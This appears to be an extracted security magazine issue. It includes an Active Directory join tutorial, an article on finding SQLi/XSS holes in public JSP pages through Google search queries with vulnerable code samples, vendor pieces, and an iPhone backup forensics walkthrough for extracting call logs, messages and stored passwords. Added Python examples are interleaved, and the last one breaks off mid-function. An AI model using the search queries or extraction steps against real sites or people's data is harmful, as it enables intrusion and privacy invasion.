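On a real host, `lint_lsassd(open("/etc/likewise/lsassd.conf").read())` after every edit and before `lw-refresh-configuration` catches the two settings that matter most for exposure: unsigned LDAP traffic and an empty group restriction.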



Using Likewise Open 

You are now ready to join a Linux server to the domain. You will need an account with 
domain join privileges or an Administrator. Use the domainjoin-cli script to accomplish 
this. I have already created a computer group in the Domain Controller called UnixLinux. 



root@ubuntu:~# /opt/likewise/bin/domainjoin-cli join --ou Corp/Computers/Servers/UnixLinux mydomain.com matt.grantham 
Joining to AD Domain:   mydomain.com 
With Computer DNS Name: ubuntu.mydomain.com 

matt.grantham@MYDOMAIN.COM's password: 
SUCCESS 
root@ubuntu:~# 



If successful, this server will populate the UnixLinux group in your Domain Controller. 



[Screenshot: Active Directory Users and Computers, showing the UBUNTU computer object under mydomain.com > Corp > Computers > Servers > UnixLinux]
You will also need a user group called UnixLinux. Add users to this group, since Likewise is configured to allow only those who are in it to log in.



[Screenshot: Active Directory Users and Computers, showing the UnixLinux security group and its Properties > Members tab listing John Doe and Matt.Grantham from mydomain.com/Users]

Test your login credentials for John Doe.

    login as: john.doe
    Using keyboard-interactive authentication.
    Password:
    Linux ubuntu 2.6.31-14-generic #48-Ubuntu SMP Fri Oct 16 14:04:26 UTC 2009 i686

    Use of this computer to engage in any activity which constitutes
    violation of local, state, and/or federal law, including, but not
    restricted to, copyright law is strictly prohibited

    Last login: Thu Apr 29 13:04:00 2010 from 192.168.127.1
    john.doe@ubuntu:~$ pwd
    /home/john.doe
    john.doe@ubuntu:~$

The login for the Active Directory user John Doe is successful.



With the rise of compliance risks and auditing, this approach gives administrators a way to track user activity at one central point. A Kerberos authentication ticket is generated in Active Directory upon logging into a Linux server with Likewise Open installed.

Domain credentials now take the place of static Linux accounts, which eliminates the task of managing users on each server.

Password policy enforcement can be the same for Linux users as it is for Windows users. These are just some of the many benefits of using Likewise Open.

For more advanced features and functionality such as group policy management, advanced reporting features, and directory migration, demo the Enterprise version of Likewise Open.



Matt Grantham is an experienced security professional currently working as a Network Security Engineer. He 
has a bachelor's degree in Information Technology and holds the CEH certification. He can be reached at 
mattgrantham@hotmail.com and www.whitehatmatt.blogspot.com. 
MD:Pro is a vast malware repository with a huge collection of samples, for the purposes of analysis, testing and malware research. It is a paid service, aimed at corporate applicants only.

http://www.frame4.net
Hacking under the radar

by Jerry Mangiarelli

Whether the targets are selected for financial or political reasons, today's web-based attacks have two things in common: they are subtle and they are precise. But the first characteristic is the one that gives headaches to the individuals who are charged with monitoring malicious activity.

With this article I intend to put the spotlight on the process of discovering web-based application vulnerabilities, the exploitation of which (and the consequent compromises) can go undetected for weeks, months, and even years.

To ensure that your web applications are secure, the application code is run through the security stages of the software development lifecycle, manual or automated source code analysis, and automated web scanners.

Attackers probe for vulnerabilities by submitting exploit strings or modifying parameters, hoping that a response will provide them with the information needed for the exploit. Web applications are dependent on many different technologies (web servers, operating systems, etc.). Attackers target various areas of this technology stack in order to identify vulnerabilities that can be exploited for executing chained attacks - attacks in which finding one weakness enables the attackers to locate other exposed components and fully compromise the system.

Finding vulnerabilities

My research began by attempting to locate the first area of the stack that is vulnerable. Web servers are notorious for having misconfigured file permissions or, in some cases, for combining web content and application source code in the same document root. It is considered extremely risky when application source code is available for public viewing, because this gives attackers the opportunity to perform a specific search for web application vulnerabilities and to manually review the code in order to find one, making it unnecessary to send exploits or to trigger a detective device.

Finding SQL Injection (SQLi) vulnerabilities

The following example illustrates how Google can be used to search for SQLi vulnerabilities. The query is as follows:

    filetype:jsp intext:stmt.executeQuery

The query starts by locating the file type "jsp"; intext: then locates any instance where the body of the text contains the vulnerable API "stmt.executeQuery". A manual review of 10 pages (JSP) revealed 7 SQLi vulnerabilities. The code below displays an SQLi vulnerability found with the vulnerable API search. In some situations, if the page isn't rendered to display the source code, one must perform a "view source" to view the static/dynamic source code.

    stmt = connection.createStatement();
    String query = "select * from v " + request.getParameter("Category") + " order by `Brand_ID`";
    rs = stmt.executeQuery(query);

Finding Cross-Site Scripting (XSS) vulnerabilities

In this next example, locating a page that contains XSS vulnerabilities is just as easily achievable as in our previous example. In this instance, the search explicitly locates files of your choice; this example narrows our search to "index.jsp" exclusively.

    inurl:index.jsp intext:request.getparameter()

Our search criteria returned a number of results that located "index.jsp" pages using the "getParameter" API. The API is used to return the value of a request parameter passed in the query string. A manual review of 10 pages revealed 67 XSS (persistent and reflected) vulnerabilities.

    UFirstName = request.getParameter("FirstName");

    <input type="text" value="<%=UFirstName%>" name="FirstName" size="15">
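As an added example (Python, not code from the article), here are hardened counterparts of the two JSP fragments above. The Category value is spliced in as a table name, which no bind variable can protect, so it is checked against an allow-list, while the value-typed search term travels as a bind parameter; the FirstName value is attribute-encoded before it is placed in the input tag. The table names, schema and rows are constructed.

```python
"""Hardened counterparts of the JSP SQLi and XSS fragments above (added example)."""
import html
import sqlite3

# The JSP code splices request.getParameter("Category") in as a TABLE NAME.
# A bind parameter cannot carry an identifier, so identifiers are checked
# against a fixed allow-list instead (constructed names).
CATEGORY_TABLES = {"v_books", "v_music", "v_video"}


def category_table(category):
    """Map a request parameter to a known table name, or refuse it."""
    if category not in CATEGORY_TABLES:
        raise ValueError(f"unknown category {category!r}")
    return category


def search_products(conn, category, term):
    """The search term travels as a '?' bind parameter, so any quote
    characters inside it are data for the driver, never SQL syntax."""
    table = category_table(category)
    sql = (f'SELECT name, Brand_ID FROM "{table}" '
           'WHERE name LIKE ? ORDER BY Brand_ID')
    return conn.execute(sql, ("%" + term + "%",)).fetchall()


def input_field(name, value):
    """Counterpart of <input value="<%=UFirstName%>">: encode the value for an
    HTML attribute so '"', '<', '>' and '&' cannot close the attribute or tag."""
    return '<input type="text" name="{}" value="{}" size="15">'.format(
        html.escape(name, quote=True), html.escape(value, quote=True))


def demo_db():
    """Constructed in-memory schema standing in for the article's 'v' tables."""
    conn = sqlite3.connect(":memory:")
    conn.execute('CREATE TABLE "v_books" (name TEXT, Brand_ID INTEGER)')
    conn.executemany('INSERT INTO "v_books" VALUES (?, ?)', [
        ("Python Basics", 1),
        ("O'Reilly Guide", 2),
        ("Data Science", 2),
    ])
    return conn


if __name__ == "__main__":
    conn = demo_db()
    print(search_products(conn, "v_books", "O'Reilly"))  # quote handled by the driver
    try:
        search_products(conn, "orders", "x")
    except ValueError as err:
        print("rejected:", err)
    print(input_field("FirstName", 'Ann "Q" <Lee>'))
```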



The provided examples reveal how easy it is to locate vulnerabilities. The vulnerability search is not limited to XSS and SQLi. Searching for other unsafe APIs will provide the same results: OS command execution (Runtime.getRuntime), or vulnerabilities associated with other languages such as PHP, Perl and ASP (for instance, inurl:default.asp intext:Response.Write).

The benefit of reviewing source code becomes clear when one attempts to bypass the protective measures. For instance, being able to review how the input validation is constructed makes it possible to evade that validation. In addition, source code comments help to explain the internal workings of the application and to identify business logic vulnerabilities.

I like the saying "What is old is new again". When you think about it, the techniques described within this article use the same approach we have been witnessing for years, but we're introducing the ability to locate vulnerabilities "under the radar".



Jerry Mangiarelli is an IT Security Specialist with TD Bank Financial Group. He has spent the last 9 years as- 
sessing and researching web applications. He continues to present his research techniques and results at 
many seminars and conferences, such as EC-Council, SecTor and Federation of Security Professionals. 
SOURCE Barcelona 2010 (www.sourceconference.com)
Barcelona, Spain. 21-22 September 2010.
Use discount code SOURCEHN10 to get 15% off your ticket price.

Brucon 2010 (www.brucon.org)
Brussels, Belgium. 24-25 September 2010.

RSA Conference Europe 2010 (bit.ly/rsa2010eu)
London, United Kingdom. 12-14 October 2010.

InfoSecurity Russia 2010 (www.infosecurityrussia.ru)
Moscow, Russia. 17-19 November 2010.

Securecomm 2010 (www.securecomm.org)
Singapore. 7-10 September 2010.

Gartner Security & Risk Management Summit (europe.gartner.com/security)
London. 22-23 September 2010.

2nd International ICST Conference on Digital Forensics & Cyber Crime (www.d-forensics.org)
Abu Dhabi, UAE. 4-10 October 2010.

ISSE 2010 (www.isse.eu.com)
Berlin, Germany. 5-7 October 2010.

GRC Meeting 2010 - Lisbon/Portugal (www.grc-meeting.com)
Lisbon, Portugal. 28-29 October 2010.
AppSource Analytics

The AppSource Analytics platform is a unique hybrid model for web application, site and software security. It is Software as a Service (SaaS) for the enterprise.

Blueinfy has designed and developed a technology platform to assess source code using a combination of static source code analysis along with dynamic simulations. The platform is capable of processing several different languages and frameworks to determine possible security vulnerabilities in enterprise applications and generate accurate reports.

USA: +17146563652




Infosecurity Europe is held every year in London. The event provides a free education program, and exhibitors showcasing new and emerging technologies and offering practical and professional expertise. (IN)SECURE Magazine was at the show and here are some images from the show floor.

This year's show was the busiest and most successful show to date, with 324 exhibitors on the show floor and 12,556 unique visitors through the door (excludes exhibitors and repeat visits).

The keynote program addressed the security issues and pressures that organizations face in an increasingly mobile and global working environment. Leading security experts, industry innovators and speakers from the end-user community provided expert analysis, real-life case studies, strategic advice and predictions.

The program included speakers from eBay, Lloyds, Camelot, Lufthansa, Network Rail and Barclays.
Remote workers dream of accessing their files and applications anytime, anywhere. But how do you stop that dream from becoming a security nightmare? Here's a look at the evolution of secure virtual workspaces.

Over the past decade, enterprises have experienced a significant increase in workforce mobility. Employees routinely connect to their offices from home PCs via VPN connections, use wireless hotspots in airports, and receive work emails on smartphone devices. What's more, organizations are offering access to partners and contractors.

While this drive for "anytime, anywhere" access to applications and resources offers advantages in terms of productivity and efficiency, it also introduces a number of significant security risks to the enterprise.

First, there's the diversity of remote access methods being used for business. Some employees will use company laptops or home PCs to connect to the office via VPN links; some will process work emails on smartphones or handheld devices. Another group may use wireless hotspots or Internet kiosks in public areas, or log in from PCs at partner or customer sites.

Some of these remote endpoints are fully managed and under the control of the business IT team; others may be completely insecure and unmanaged. Extending secure access across this wide range of methods and devices is a headache for any organization.

Second, enterprises need to protect their sensitive company or customer data against the risks of data breaches. Corporate laptops and smartphones are all too easily lost or stolen, and often lack encryption - making them easy prey for thieves.

Information such as passwords, login credentials, and sensitive files can be left behind on untrusted devices at the end of a remote access session, making it available to subsequent users. And of course there's the ever-present threat of malware, spyware and malicious attacks, both from the web and from unsecured PCs.

Last, but by no means least, there's the sheer cost of owning and managing a fleet of corporate laptops or portable devices to allow mobile working. These costs include the purchase price, software licensing, security applications, managing updates and patches, repairs and replacements, and so on.

The checklist for remote working

Businesses need a solution that:

• Gives flexible and secure access to information resources and applications from almost any location and type of PC.

• Keeps sensitive data secure at all times against loss, theft or hacking.

• And is cheaper to deploy and manage than a traditional laptop PC, to help reduce the total cost of ownership (TCO).
Ideally, the solution should also work seamlessly and transparently for remote workers, so they can use their time productively. Users shouldn't have to waste time on issues such as unnecessary re-authentication or connection issues when using VPNs. Nor should they have to remember to encrypt individual files or documents when they are copying or saving their work. The solution must also be unobtrusive in action, so it doesn't interfere with the user's activities, while applying security to protect against external threats and the user's own mistakes or oversights.

Meeting this checklist of requirements could be fearsomely complex if conventional point security products were used - such as separate VPN, anti-virus, encryption, personal firewalling and intrusion prevention.

However, the introduction of virtualization technology in recent years has led to the development of a new approach, which greatly reduces the complexity of remote access security, while simplifying central management and ergonomics for the user. This is the secure workspace concept.

Endpoint security on-demand

This concept was first introduced some four years ago, as a feature on advanced remote access gateways. These gateways were able to deliver 'endpoint security on demand' to the user's remote PC, by combining two processes: endpoint compliance and secure workspace.

The endpoint compliance process includes:

• Policy enforcement — the gateway scans the remote PC prior to granting access, and enforces access policies according to the results of the scan. This enables matching of access rights to the level the remote PC can be trusted, and includes factors such as whether security software like antivirus and firewall applications are installed and running, and whether the latest Windows patches have been installed.

• Guest computer security checks — once policy enforcement is complete, a remote malware scan can be performed to identify and remove keystroke loggers, Trojan horses and crimeware.

If the remote PC passes the endpoint compliance process, then the secure workspace is established, to give session confidentiality through the VPN tunnel. This includes:

• An encrypted SSL VPN session with the remote PC, to protect data input and processed while connected. This ensures that no usable information remains on the PC when the session ends.

• Cache cleaning on the remote PC at the session's end, to erase browser history, downloaded files, clipboard items and so on. Together with encryption, this helps to remove most traces of the session.

However, while this on-demand approach is very useful in both enforcing security and enabling relatively flexible remote access, it isn't a perfect solution. What happens if the remote computer doesn't pass the endpoint compliance scan, and isn't allowed to connect to the corporate network? In that case, the user cannot access the data or applications that they need, inhibiting their ability to work - unless they can find an alternative PC that meets compliance requirements.

Another issue is that the remote session only gives VPN access to certain permitted applications. It doesn't give the user access to their desktop PC as if they were actually in the office.

Online and offline security

What's needed is an extension of the on-demand approach, which enables the user to get secure access to their desktop, and the corporate network, from any PC, no matter how insecure it is, and no matter what malware or other infections it may be carrying.

Further, if the user cannot set up a VPN session from the remote PC they're using, due to connection constraints for example, why not enable secure offline access to their desktop and data? If this secure workspace can be made easily portable, fully managed and with always-on, tamper-proof encryption, so much the better.
A secure PC in your pocket

For a number of years now, having a personal 'PC on a flash drive' has been an option for users. The main reason is that multi-gigabyte USB thumb drives are readily affordable. For example, IT magazines regularly run features on how to create a bootable flash drive that contains your preferred applications and data, allowing you to carry your PC in your pocket. Because of security concerns, this method has not, until now, been recommended for corporate deployments.

Conventional flash drives do not easily support remote access or security applications, such as anti-virus and encryption. Nor do they support centralized management. However, secure flash drives are now available with on-board, automated hardware encryption. This imposes mandatory access control on all files written to the drive, storing them in a private partition that is strongly encrypted and password-protected. They can also lock down automatically when a specified number of incorrect password attempts are made, to secure stored data in the event of drive loss or theft.

These secure drives also support central management by enterprise IT teams. This means that drive usage can be monitored, complete with records of files written to and from the drives (which helps with re-provisioning new drives for users in the event of loss or theft). Some drives also support remote termination, which renders them unusable if misplaced or stolen.






Desktop-to-go

Why not use a secure drive as the platform for a portable, virtual workspace solution? When inserted into the USB port of any PC, the solution could transform the host into a temporary, trusted endpoint with a secure VPN connection to the corporate network.

The solution should present the user with the same Windows desktop that they have in their office, complete with preferred shortcuts and access to documents. These files can be manipulated using the host PC's office applications, while the user's data remains secure in the separate, secure virtual workspace that runs parallel to the host environment. This would protect the integrity of both local data and the corporate network, shielding it against malware, hacking attempts and data loss or theft.

But how should the data security components of a secure flash drive be extended to deliver this functionality? How do we enable remote access and secure, sandboxed sessions on the host machine, generated from the user's flash drive, while keeping the process simple and transparent for the user? Let's take a closer look at how this can be achieved.



Creating the secure, virtual workspace

The goal when creating a virtual workspace is to protect the user's session on the host PC by enclosing it in a "bubble of security" as soon as the session starts up. In this case, the session starts when the user inserts their secure USB drive into the host machine.

The secure flash drive's firmware would contain both a login program and a virtualization engine. Upon insertion, the login program launches and is granted access to the flash drive firmware, where the user's sensitive information is stored. The user is then presented with a login screen, where they enter their security credentials.

Following a successful login, the virtualization engine creates a new virtual file system as the basis for the secure workspace, and an instance of Explorer.exe is started within this virtual system.

All subsequent processes will be started as "child" processes of this new Explorer.exe. This allows applications and the VPN session to be controlled inside the newly-created secure workspace on the host PC.
This process, called precision emulation, means there is no large installation on the host PC and much lower system memory consumption. In turn, this boosts performance, and means there is no need for the user to track or manage multiple operating systems or file systems. The virtualization engine automatically maintains the virtual system it creates.

Precision emulation and hooking

The Microsoft Windows NT dynamic-link library (NTDLL) acts as a barrier between the user environment and the host PC's system kernel. The precision emulation process performs a special sort of hooking on this barrier, intercepting application code execution before it reaches NTDLL.

This process redirects all file and registry input/output (I/O) calls for the applications being used inside the secure workspace - such as web browsing, word processing, spreadsheets and so on - to the user's flash drive. This means all applications running inside the new secure virtual workspace, including the new Explorer.exe, operate in a virtual file system and registry. The virtual files and all registry data are written to the flash drive instantly, and immediately encrypted.

If an application requests file creation inside the secure workspace, the CreateFile Win32 API function is called. This call is intercepted and the file is actually created within the flash drive's file system. In effect, this means a secure channel to the applications stored on the host PC is created. This way, the host's applications can be used to create and edit files, but data is not transferred to, nor available on, the host PC. This special hooking does not require the installation of a driver component. It dramatically reduces the potential for conflicts between the secure virtual workspace and the software applications on unmanaged computers.

In this architecture, the memory spaces of applications within the secure workspace and those of ordinary applications on the host PC are not separated, which avoids memory conflicts. In addition to NTDLL, several other Microsoft Windows dynamic-link libraries are hooked in the same manner, to provide additional security.

Data defenses: Leaving no traces

The methods described above show how the secure, virtual workspace is created and managed, enabling the user to take advantage of the host PC's applications, while ensuring the user's data does not touch the host.

When the user ends the session, the secure virtual workspace disappears, and because all user and registry data is written to the flash drive and encrypted, never reaching the host PC, no trace of the session or of the VPN connection remains. Even when the solution is not in use, all sensitive user information is encrypted on the flash drive, so user credentials, information contained in documents, and other sensitive data remain protected if the device is lost. Additional desirable features include anti-keylogging, to protect against malware on the host PC that may record keystrokes, and the ability to enforce and manage specific security policies. Policies should cover the copying of files from the secure workspace to the host PC, printing of files, and the use of certain applications.

The key to plug-in security

With this solution, enterprises can provide employees, contractors and partners with a consistent, controlled, encrypted and secure virtual workspace - completely independent of the host computer. Security teams have the ability to enforce mandatory access control on all files, which are stored in a hardware-encrypted, password-protected partition to enable compliance with privacy regulations.

This USB-based solution is far less expensive to purchase and manage than a fleet of laptops, and automatically applies and enforces security without the user's intervention. All together, it delivers a pocket-sized, secure work environment, whether the user is online or offline.



Nick Lowe is head of Western Europe sales for Check Point (www.checkpoint.com). He is an expert across IT 
security, from technology development and evolving threats to compliance and security reporting. 
SecureComm 2010

6th International ICST Conference on Security and Privacy in Communication Networks

7-10 September, 2010 - Singapore

SecureComm 2010 - the 6th edition of a successful international conference series on Security and Privacy in Communication Networks - invites you to vibrant Singapore this year.

The conference brings together security and privacy experts from academia, the corporate world, and the governmental sector, as well as practitioners, standards developers, and policy makers. Participants will engage in a discussion about common goals and explore important research directions in the field of secure communications and networking.

SecureComm 2010 also serves as a forum to learn about state-of-the-art advances in security and privacy research, being the host of the annual

The GSC initiative awards start-up companies, entrepreneurs and researchers from the security technology field with over 500,000 USD in grants. Participants of GSC will showcase their innovations in front of venture capitalists and the media, as well as government and industry leaders present at SecureComm 2010.

For more information visit: www.securecomm.org or e-mail: marketing@icst.org




iPhones have been in use for a while now, and many are backing them up to either their own machines or to a machine owned by their current employer. I'm here to talk about an option you are offered when backing up your iPhone - the Encrypt iPhone backup:

[Screenshot: iTunes sync options - "Automatically sync when this iPhone is connected", "Sync only checked songs and videos", "Manually manage music and videos", "Encrypt iPhone backup" (checkbox), "Change Password..."]



I have an iPhone with a few applications installed, and I regularly sync it with my MacBook Pro. I have a lot of contacts, calendar entries and various application data on the iPhone. One day, my car and everything inside it is stolen - including my MacBook. Unfortunately for me, the thieves are not just computer savvy, they're part of a large crime syndicate that's been targeting not just me but my entire organization for a while now.

They know that I am in charge of the security team that safeguards my company's secrets, and they know that I am a Mac/iPhone user because I have mentioned it in various posts, tweets and regular Facebook updates.

Getting started

I don't use my MacBook for work, so it is not protected quite as well as my work machine. It is also not protected by FileVault, because I prefer the simplicity of Time Machine as a backup solution.

When I first synced my new iPhone with my Mac, I did not check the box that said "Encrypt Backups...". Consequently, the ~/Library/Application Support/MobileSync/Backup/xxx directory holds the unencrypted backup files for my iPhone.
Basic structure and files

The xxx portion of the directory structure is a unique identifier for my iPhone. It is not related to the IMEI number or anything as dubious as that, but it can be matched to the iPhone. Within that directory a very large number of files (made up primarily of .mdinfo and .mddata files) is stored. There are also three files that stand out like a sore thumb:

    Info.plist
    Manifest.plist
    Status.plist

But more on those later. First of all, let's take a look at those .mdinfo and .mddata files. There are enough of them to warrant a quick exploration with some bash/sed/awk/file magic:
It seems that there are quite a few different files here. The images could be somewhat intriguing, but it's the SQLite databases and XML documents that will prove to be the most interesting:

    ASCII text
    ASCII text, with no line terminators
    Apple binary property list
    DOS executable (device driver)
    GIF image data, version 89a, 586 x 542
    HTML document text
    JPEG image data, EXIF standard
    JPEG image data, EXIF standard 2.21
    JPEG image data, JFIF standard 1.01
    JPEG image data, JFIF standard 1.01, comment
    PDF document, version 1.3
    PDF document, version 1.4
    PNG image, 313 x 480, 8-bit/color RGBA, non-interlaced
    PNG image, 323 x 463, 8-bit/color RGBA, non-interlaced
    PNG image, 323 x 483, 8-bit/color RGB, non-interlaced
    PNG image, 323 x 483, 8-bit/color RGBA, non-interlaced
    PNG image, 483 x 323, 8-bit colormap, non-interlaced
    PNG image, 835314566 x 396263525, 3-bit grayscale,
    SQLite 3.x database
    SQLite 3.x database, user version 3
    SQLite 3.x database, user version 327686
    XML document text
    data
    empty
Luckily for me, the file names don't give anything away. The file extensions are related, though.

A quick Google search can tell the thieves that each .mdinfo file has a related .mddata file and that they're created by the iPhone/iTunes backup process.

Take the ffe6ddb2ac75ba5b561690c59aafdf5b6001bee4.mddata file as an example. A quick "file" on that can reveal it's "JPEG image data, EXIF standard", which indicates that the file is indeed a JPEG. If "strings" is run on the related .mdinfo file, interesting information will come to light:

    zonbi:data_dir mattj$ strings ffe6ddb2ac75ba5b561690c59aafdf5b6001bee4.mdinfo
    bplist00
    WVersion[IsEncrypted^StorageVersionXMetadata[AuthVersionS3.0
    T1.00
    bplist00
    TPathWVersionXGreylistVDomain_
    Media/DCIM/100APPLE/IMG_0103.JPGS3.0
    [MediaDomain
    1.DUV
    bsi.a
    '67KQPT

One can clearly see a file name with the associated path in that output, and that could lead to the assumption that this is an image taken with the iPhone camera. It still doesn't provide information such as geo-location data, but I'm sure the EXIF data will be a veritable treasure trove.

Plist files: friend, enemy or just a very 
noisy neighbor? 

Before we dig any deeper into the backup 
files and start poking around the SQL data- 
bases, let's take a look at those three files we 
flagged at the very beginning. 

First off, we have the Info.plist file. For those of you who are new to the OS, a plist file is a "Property List" file and holds information about applications and the like. In this case, it holds various information about my iPhone.

It's a simple, easy-to-read XML formatted file, from which a lot of information about the iPhone can be learned:

• Build Version
• Device Name
• IMEI number
• Last Backup Date
• Serial Number
• Target Identifier (which matches our backup directory magic number)
• iTunes Version.



There are also a bunch of base64-encoded blobs (XML plist <data> elements) within the plist file. Free beers to the person who can decode them and tell (IN)SECURE Magazine what they contain (beer will be provided by the author and not the magazine.)

Next up is the Manifest.plist file. It contains four keys:

• AuthSignature
• AuthVersion
• Data
• IsEncrypted

This file is used as a manifest for the backup, to check for file corruption. Again, it looks like the Data portion is base64-encoded, but I haven't had the chance to verify this.

Finally, we have the Status.plist file, which contains one key:

<key>Backup Success</key>

Not really useful for anything other than time-stamping the last successful backup of the iPhone.

The meat and potatoes 

Now that we've gone through the basics and 
found where we can get information about the 
iPhone (as well as grab any images that were 
held on the device), it's time to dig into the 
SQLite databases. 
On my backup there were quite a few of them - 37 in total. The SQLite databases hold all sorts of information about applications on the iPhone: the SMS database, the contacts database, as well as things like the calls database. Since the files are not encrypted, extracting information from them is extremely easy.

The commands we're going to use in the sqlite3 shell are:

    .dump   - Dump the entire database out.
    .tables - List the tables in the database.
    SELECT  - You should know basic SQL statements by now.

Probably the most interesting thing is the phone call log. If we do a "SELECT * FROM calls", we get a table like this (the dialed numbers are redacted):



    519 | +27[redacted] | 1256071607 | [unreadable] | 4       | -1
    520 |    [redacted] | 1256975423 | 72           | 5       | -1
    521 | +27[redacted] | 1256976792 | 114          | 4       | -1
    522 | +27[redacted] | 1256978601 | 9            | 4       | -1
    523 |    [redacted] | 1256980615 | 19           | 4       | -1
    524 | +27[redacted] | 1256980969 | 138          | 4       | -1
    525 |    [redacted] | 1256993252 | 30           | 5       | 358
    526 | +27[redacted] | 1256993412 | 441          | 4       | -1
    527 | +27[redacted] | 1257015607 | 0            | 1507333 | 358
    528 |    [redacted] | 1257015627 | 557          | 4       | -1



As you can see, the logs are all kept in a neat fashion. What's more, you can see exactly what happened during those calls. Through a little trial and error I came up with the following analysis of the entries. If I am wrong, please feel free to correct me.

Assumption:

    500 | +27[redacted] | 1256804196 | 29 | 5 | 393
     1         2              3         4   5   6



Position one is the call number in the database. This will increase sequentially as more calls are made.

Position two is the actual number that was dialed.

Position three is the epoch time when the call was made. A simple bit of perl (perl -e 'print scalar(gmtime(1256804172)), "\n"') will give you the time in a form us humans can read.

Position four is the duration of the call in seconds.

I haven't been able to figure out position five yet. It flips between a 4 and a 5 and there doesn't seem to be a relation to the type of call made. If anyone knows the answer to this, please feel free to get in touch with me.

I believe position six to be the status of the call. If the call is missed, the field is filled with -1. However, when the call is successful it's filled with either 358, 398, 388 or 348. I can't figure out the significance of these numbers, so if anyone has more information, please let me know.
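To work with this table rather than eyeball it, here is an added Python example (mine, not the author's tooling): it loads a constructed copy of the call log above into an in-memory SQLite database, converts the epoch column the way the perl one-liner does, and aggregates talk time per number. The column names are assumptions (the article only identifies columns by position) and the phone numbers are invented, since the originals were redacted. The labels for columns five and six follow the usual forensic reading of this table rather than the article's: 4 = outgoing, 5 = incoming, and the last column is the address-book record ID of the other party, -1 when the number is not a saved contact. That reading also fits the rows above, where row 520 carries -1 together with a 72-second duration, which a "missed" status would not explain.

```python
import sqlite3
import time

# Constructed rows modelled on the call log above.  Column names are an
# assumption (the article identifies columns only by position); the phone
# numbers are invented because the originals were redacted.
SAMPLE_ROWS = [
    (520, "+27110000001", 1256975423, 72, 5, -1),
    (521, "+27110000002", 1256976792, 114, 4, -1),
    (522, "+27110000002", 1256978601, 9, 4, -1),
    (525, "+27110000003", 1256993252, 30, 5, 358),
    (526, "+27110000002", 1256993412, 441, 4, -1),
    (527, "+27110000003", 1257015607, 0, 4, 358),
]

# Reading of column five used for the labels below: the usual forensic
# interpretation of this table (4 = outgoing, 5 = incoming), not something
# the article itself establishes.
FLAG_DIRECTION = {4: "outgoing", 5: "incoming"}


def build_sample_db():
    """Create the calls table in memory and load the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        """CREATE TABLE calls (
               call_id  INTEGER PRIMARY KEY,   -- position 1
               address  TEXT,                  -- position 2: dialed number
               date     INTEGER,               -- position 3: epoch seconds
               duration INTEGER,               -- position 4: seconds
               flags    INTEGER,               -- position 5: 4 or 5
               id       INTEGER)"""            # position 6: -1 or a record ID
    )
    conn.executemany("INSERT INTO calls VALUES (?, ?, ?, ?, ?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def epoch_to_utc(epoch):
    """Same conversion as the perl gmtime() one-liner, in ISO-style form."""
    return time.strftime("%Y-%m-%d %H:%M:%S UTC", time.gmtime(epoch))


def dump_calls(conn):
    """Decode every row into something a human can read, oldest first."""
    rows = conn.execute(
        "SELECT call_id, address, date, duration, flags, id FROM calls ORDER BY date"
    )
    decoded = []
    for call_id, address, date, duration, flags, contact in rows:
        decoded.append({
            "call_id": call_id,
            "number": address,
            "when": epoch_to_utc(date),
            "duration_s": duration,
            "direction": FLAG_DIRECTION.get(flags, f"unknown({flags})"),
            # Assumption: column six is an address-book record ID, -1 = no contact.
            "in_contacts": contact != -1,
            "answered": duration > 0,
        })
    return decoded


def talk_time_by_number(conn):
    """Who the owner actually talks to: (number, call count, total seconds)."""
    rows = conn.execute(
        "SELECT address, COUNT(*), SUM(duration) FROM calls "
        "GROUP BY address ORDER BY SUM(duration) DESC"
    )
    return [(addr, count, total) for addr, count, total in rows]


if __name__ == "__main__":
    db = build_sample_db()
    for call in dump_calls(db):
        print(call)
    for addr, count, total in talk_time_by_number(db):
        print(f"{addr}: {count} calls, {total}s total")
```

Point the same queries at the real database with sqlite3.connect("<hash>.mddata") once you know which file it is; the schema there may differ, so check it with .schema first.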

The other SQLite databases of interest are the Notes databases. If you're really lucky, you can find notes on passwords to servers, IP addresses and all the usual stuff people want to store but don't think to put in something that should be encrypted.

There's also the SMS database, which is very 
similar to the Calls database. It contains fields 
denoting message status, number of the 
sender and the like - a great source of 
information on your target. 

Finally, there are databases belonging to installed applications. Is the iPhone owner using Facebook? The Facebook database has all the contacts of that user. There isn't anything juicy like usernames or passwords, but there are links to each contact's profile picture.
This is presumably used by the application for the profile picture. Not very useful for anything other than stalking. Probably the biggest headache of the SQLite databases is that they cannot be easily identified. The file names look like SHA1 hashes, so finding out what a SQLite database contains is a trial and error process. You could script a lot of it, which would make life a lot easier.
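The strings output earlier shows that each .mdinfo file is a binary plist whose Metadata key holds a second, nested plist carrying the original Path and Domain. That is enough to script the identification step the previous paragraph asks for. The following Python is an added example, not the author's tooling: it builds a constructed .mdinfo-style blob in that shape (the key names come from the strings output; the value types are my assumption), recovers Path and Domain from it, sniffs the matching payload by magic bytes, and derives the backup file name as the SHA-1 of "Domain-Path". That naming rule is documented for iTunes backups generally; the article only observes that the names look like SHA1 hashes, so treating it as valid for the .mddata layout here is an assumption.

```python
import hashlib
import plistlib

# Magic bytes for the payload types the article's file(1) listing reports.
MAGIC = [
    (b"bplist00", "Apple binary property list"),
    (b"SQLite format 3\x00", "SQLite 3.x database"),
    (b"\xff\xd8\xff", "JPEG image data"),
    (b"\x89PNG\r\n\x1a\n", "PNG image"),
    (b"GIF8", "GIF image data"),
    (b"%PDF", "PDF document"),
    (b"<?xml", "XML document text"),
]


def sniff(blob):
    """Classify a payload by its leading bytes (a tiny stand-in for file(1))."""
    if not blob:
        return "empty"
    for magic, label in MAGIC:
        if blob.startswith(magic):
            return label
    return "data"


def make_sample_mdinfo(domain, path):
    """Constructed .mdinfo-style blob modelled on the strings output above:
    an outer bplist (Version, IsEncrypted, StorageVersion, Metadata,
    AuthVersion) whose Metadata is itself a bplist with Path, Version,
    GreyList and Domain.  Value types are an assumption."""
    inner = {"Path": path, "Version": "3.0", "GreyList": False, "Domain": domain}
    outer = {
        "Version": "3.0",
        "IsEncrypted": False,
        "StorageVersion": "1.0",
        "AuthVersion": "1.0",
        "Metadata": plistlib.dumps(inner, fmt=plistlib.FMT_BINARY),
    }
    return plistlib.dumps(outer, fmt=plistlib.FMT_BINARY)


def parse_mdinfo(blob):
    """Recover domain, original path and the encryption flag from a .mdinfo blob."""
    if not blob.startswith(b"bplist"):
        raise ValueError("not a binary plist")
    outer = plistlib.loads(blob)             # plistlib detects XML vs binary itself
    inner = plistlib.loads(outer["Metadata"])  # the nested plist seen by strings(1)
    return {
        "domain": inner["Domain"],
        "path": inner["Path"],
        "encrypted": bool(outer.get("IsEncrypted", False)),
    }


def backup_filename(domain, path):
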